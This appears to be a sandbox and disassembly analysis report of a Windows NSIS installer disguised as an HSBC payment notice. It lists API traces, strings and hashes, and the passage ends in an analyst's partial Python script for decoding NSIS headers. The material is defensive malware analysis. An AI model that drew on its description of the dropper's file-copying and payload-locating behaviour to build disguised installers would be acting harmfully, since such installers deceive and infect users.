          control_flow_graph for 00403358: basic blocks 0-113, entry block 403358-4033ee (#17 SetErrorMode OleInitialize call 406252 SHGetFileInfoW call 405ee8 GetCommandLineW call 405ee8 GetModuleHandleW); block and edge data omitted.
          APIs
          • #17.COMCTL32 ref: 00403377
          • SetErrorMode.KERNELBASE(00008001), ref: 00403382
          • OleInitialize.OLE32(00000000), ref: 00403389
            • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
            • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
            • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
          • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1
            • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
          • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\HSBC Payment Advice.exe",00000000), ref: 004033D9
          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\HSBC Payment Advice.exe",00000020), ref: 00403400
          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403509
          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351A
          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403526
          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353A
          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403542
          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403553
          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355B
          • DeleteFileW.KERNELBASE(1033), ref: 0040356F
          • ExitProcess.KERNEL32(?), ref: 0040361A
          • CoUninitialize.COMBASE(?), ref: 0040361F
          • ExitProcess.KERNEL32 ref: 0040363F
          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\HSBC Payment Advice.exe",00000000,?), ref: 0040364B
          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\HSBC Payment Advice.exe",00000000,?), ref: 00403657
          • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403663
          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366A
          • DeleteFileW.KERNEL32(0041FE90,0041FE90,?, eremo$,?), ref: 004036C4
          • CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036D8
          • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
          • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
          • ExitProcess.KERNEL32 ref: 004037BA
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: ExitFileProcess$DirectoryHandlelstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
          • String ID: eremo$$"C:\Users\user\Desktop\HSBC Payment Advice.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion$C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
          • API String ID: 2762237255-110307709
          • Opcode ID: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
          • Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
          • Opcode Fuzzy Hash: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
          • Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph for 004052d1: basic blocks 114-164, entry block 4052d1-4052ec (details window: GetDlgItem, GetClientRect, GetSystemMetrics, SendMessageW, CreateThread, CreatePopupMenu/TrackPopupMenu, clipboard copy); block and edge data omitted.
          APIs
          • GetDlgItem.USER32(?,00000403), ref: 00405330
          • GetDlgItem.USER32(?,000003EE), ref: 0040533F
          • GetClientRect.USER32(?,?), ref: 0040537C
          • GetSystemMetrics.USER32(00000015), ref: 00405384
          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
          • ShowWindow.USER32(?,00000008), ref: 00405420
          • GetDlgItem.USER32(?,000003EC), ref: 00405441
          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
          • GetDlgItem.USER32(?,000003F8), ref: 0040534E
            • Part of subcall function 00404162: SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170
          • GetDlgItem.USER32(?,000003EC), ref: 00405493
          • CreateThread.KERNELBASE(00000000,00000000,Function_00005265,00000000), ref: 004054A1
          • CloseHandle.KERNELBASE(00000000), ref: 004054A8
          • ShowWindow.USER32(00000000), ref: 004054CC
          • ShowWindow.USER32(?,00000008), ref: 004054D1
          • ShowWindow.USER32(00000008), ref: 0040551B
          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
          • CreatePopupMenu.USER32 ref: 00405560
          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
          • GetWindowRect.USER32(?,?), ref: 00405594
          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
          • OpenClipboard.USER32(00000000), ref: 004055F5
          • EmptyClipboard.USER32 ref: 004055FB
          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
          • GlobalLock.KERNEL32(00000000), ref: 00405611
          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
          • GlobalUnlock.KERNEL32(00000000), ref: 00405645
          • SetClipboardData.USER32(0000000D,00000000), ref: 00405650
          • CloseClipboard.USER32 ref: 00405656
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
          • String ID: {
          • API String ID: 590372296-366298937
          • Opcode ID: e049ca0cf4e6168e9f51d2e35110de4cedd2f19c2dadb85783735e7fb38d1665
          • Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
          • Opcode Fuzzy Hash: e049ca0cf4e6168e9f51d2e35110de4cedd2f19c2dadb85783735e7fb38d1665
          • Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69

          Control-flow Graph
          APIs
          • GetVersion.KERNEL32(00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00405FCD
          • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040604B
          • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 0040605E
          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
          • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 004060A8
          • CoTaskMemFree.OLE32(?), ref: 004060B3
          • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
          • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00406131
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
          • String ID: eremo$$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
          • API String ID: 900638850-2768416301
          • Opcode ID: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
          • Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
          • Opcode Fuzzy Hash: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
          • Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

          Control-flow Graph
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
          • Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
          • Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
          • Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
          APIs
          • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,76702EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,76702EE0), ref: 00406236
          • FindClose.KERNEL32(00000000), ref: 00406242
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Find$CloseFileFirst
          • String ID: WB
          • API String ID: 2295610775-2854515933
          • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
          • Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
          • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
          • Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD
          APIs
          • GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
          • LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
          • GetProcAddress.KERNEL32(00000000,?), ref: 00406280
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: AddressHandleLibraryLoadModuleProc
          • String ID:
          • API String ID: 310444273-0
          • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
          • Instruction ID: 168f21105135a374c063cbb502f6419b25eb399c8ec2d40735489a78174e37d1
          • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
          • Instruction Fuzzy Hash: 6FE0CD36E08120BBC7115B309D44D6773BC9FD9741305043DF505F6240C774AC1297E9
          APIs
          • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
          Strings
          • C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion, xrefs: 004020F5
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CreateInstance
          • String ID: C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion
          • API String ID: 542301482-1482619193
          • Opcode ID: 4dc91b952ef9010e06b2438cbf61f8f91b8319303aa34dd48354e337f9979de1
          • Instruction ID: c11495a377249a79f2c0f90d15cc2262a1b8c0356f549485b3d6f64f05c33611
          • Opcode Fuzzy Hash: 4dc91b952ef9010e06b2438cbf61f8f91b8319303aa34dd48354e337f9979de1
          • Instruction Fuzzy Hash: 51416F75A00104BFCB00DFA8C988EAE7BB6EF48314B20456AF905EB2D1CB79ED41CB55
          APIs
          • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040277D
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: FileFindFirst
          • String ID:
          • API String ID: 1974802433-0
          • Opcode ID: 54627da640825ce0e0734af80bc8f22e99ea7fc2d593797114434c8a738431af
          • Instruction ID: 660448b4c8776a587482eabd0d7c95c139f1dfbade13b447c4bb41c6a72f42af
          • Opcode Fuzzy Hash: 54627da640825ce0e0734af80bc8f22e99ea7fc2d593797114434c8a738431af
          • Instruction Fuzzy Hash: 7EF082B1614114DBDB00DFA5DD499AEB378FF15314F60097BF111F31D0D6B459409B2A

          Control-flow Graph
          APIs
            • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
            • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
            • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
          • lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,76703420,00000000,"C:\Users\user\Desktop\HSBC Payment Advice.exe"), ref: 00403933
          • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B3
          • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
          • GetFileAttributesW.KERNEL32(: Completed), ref: 004039D1
          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion), ref: 00403A1A
            • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
          • RegisterClassW.USER32(00428180), ref: 00403A57
          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
          • ShowWindow.USER32(00000005,00000000), ref: 00403ADA
          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AEB
          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
          • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
          • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
          • RegisterClassW.USER32(00428180), ref: 00403B1C
          • DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
          • String ID: "C:\Users\user\Desktop\HSBC Payment Advice.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
          • API String ID: 914957316-666302136
          • Opcode ID: 7591e99d3b1f4cc40b45e62746b81664c4dcf89d43ee78bcadefa554f4fd18e3
          • Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
          • Opcode Fuzzy Hash: 7591e99d3b1f4cc40b45e62746b81664c4dcf89d43ee78bcadefa554f4fd18e3
          • Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D

          Control-flow Graph
          APIs
          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
          • ShowWindow.USER32(?), ref: 00403CAE
          • DestroyWindow.USER32 ref: 00403CC2
          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
          • GetDlgItem.USER32(?,?), ref: 00403CFF
          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
          • IsWindowEnabled.USER32(00000000), ref: 00403D1A
          • GetDlgItem.USER32(?,00000001), ref: 00403DC8
          • GetDlgItem.USER32(?,00000002), ref: 00403DD2
          • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3D
          • GetDlgItem.USER32(?,00000003), ref: 00403EE3
          • ShowWindow.USER32(00000000,?), ref: 00403F04
          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F16
          • EnableWindow.USER32(?,?), ref: 00403F31
          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F47
          • EnableMenuItem.USER32(00000000), ref: 00403F4E
          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F66
          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
          • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
          • SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
          • ShowWindow.USER32(?,0000000A), ref: 004040EA
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
          • String ID:
          • API String ID: 3282139019-0
          • Opcode ID: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
          • Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
          • Opcode Fuzzy Hash: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
          • Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E

          Control-flow Graph

          control_flow_graph 339 402dba-402e08 GetTickCount GetModuleFileNameW call 405b54 342 402e14-402e42 call 405ee8 call 40597f call 405ee8 GetFileSize 339->342 343 402e0a-402e0f 339->343 351 402f32-402f40 call 402d18 342->351 352 402e48-402e5f 342->352 344 403059-40305d 343->344 358 403011-403016 351->358 359 402f46-402f49 351->359 354 402e61 352->354 355 402e63-402e70 call 4032f7 352->355 354->355 361 402e76-402e7c 355->361 362 402fcd-402fd5 call 402d18 355->362 358->344 363 402f75-402fc1 GlobalAlloc call 40636e call 405b83 CreateFileW 359->363 364 402f4b-402f63 call 40330d call 4032f7 359->364 365 402efc-402f00 361->365 366 402e7e-402e96 call 405b0f 361->366 362->358 389 402fc3-402fc8 363->389 390 402fd7-403007 call 40330d call 403060 363->390 364->358 391 402f69-402f6f 364->391 374 402f02-402f08 call 402d18 365->374 375 402f09-402f0f 365->375 366->375 384 402e98-402e9f 366->384 374->375 376 402f11-402f1f call 406300 375->376 377 402f22-402f2c 375->377 376->377 377->351 377->352 384->375 388 402ea1-402ea8 384->388 388->375 392 402eaa-402eb1 388->392 389->344 399 40300c-40300f 390->399 391->358 391->363 392->375 394 402eb3-402eba 392->394 394->375 396 402ebc-402edc 394->396 396->358 398 402ee2-402ee6 396->398 400 402ee8-402eec 398->400 401 402eee-402ef6 398->401 399->358 402 403018-403029 399->402 400->351 400->401 401->375 405 402ef8-402efa 401->405 403 403031-403036 402->403 404 40302b 402->404 406 403037-40303d 403->406 404->403 405->375 406->406 407 40303f-403057 call 405b0f 406->407 407->344
          APIs
          • GetTickCount.KERNEL32 ref: 00402DCE
          • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEA
            • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
            • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00402E33
          • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7A
          Strings
          • Error launching installer, xrefs: 00402E0A
          • "C:\Users\user\Desktop\HSBC Payment Advice.exe", xrefs: 00402DC3
          • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author , xrefs: 00403011
          • soft, xrefs: 00402EAA
          • Null, xrefs: 00402EB3
          • Inst, xrefs: 00402EA1
          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
          • C:\Users\user\Desktop, xrefs: 00402E15, 00402E1A, 00402E20
          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC7, 00402F92
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
          • String ID: "C:\Users\user\Desktop\HSBC Payment Advice.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft
          • API String ID: 2803837635-3081919234
          • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
          • Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
          • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
          • Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C
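
          The function at 0x402dba above is the NSIS stub locating its own payload container: it opens its own image (GetModuleFileNameW at 0x402dea, then the CreateFileW/GetFileSize subcalls) and, while walking the file, compares 4-byte chunks against "Inst", "soft" and "Null" (xrefs 0x402ea1, 0x402eaa, 0x402eb3), which is the reverse order in which the stub tests the three dwords of the "NullsoftInst" magic. The "Installer integrity check has failed" string is the CRC failure message, and the "Error writing temporary file" branch sits behind the GetTempFileNameW call with the "nsa" prefix (0x405b83). The script below is an added triage example, not Joe Sandbox or NSIS code; the header layout and flag values are taken from NSIS fileform.h, the 512-byte scan granularity mirrors the stub's read loop, and the input bytes are a constructed stand-in rather than the analysed sample.

```python
"""Locate and decode the NSIS 'firstheader' in an installer image.

Added example for this report, not Joe Sandbox or NSIS code. Layout and
flag values follow NSIS Source/exehead/fileform.h; the input bytes are a
constructed stand-in, not the analysed sample.
"""
import struct

NSIS_SIG = 0xDEADBEEF
NSIS_MAGIC = b"NullsoftInst"             # the "Null" / "soft" / "Inst" dwords
FIRSTHEADER = struct.Struct("<II12sII")  # flags, siginfo, magic, header_len, following_len
SCAN_STEP = 512                          # the stub reads and tests the file in 512-byte blocks
FLAG_NAMES = {1: "FH_FLAGS_UNINSTALL", 2: "FH_FLAGS_SILENT",
              4: "FH_FLAGS_NO_CRC", 8: "FH_FLAGS_FORCE_CRC"}


def decode_flags(flags: int) -> list:
    """Expand the firstheader flags word into NSIS flag names, low bit first."""
    return [name for bit, name in FLAG_NAMES.items() if flags & bit]


def _magic_positions(data: bytes):
    """Yield every byte index at which NSIS_MAGIC occurs."""
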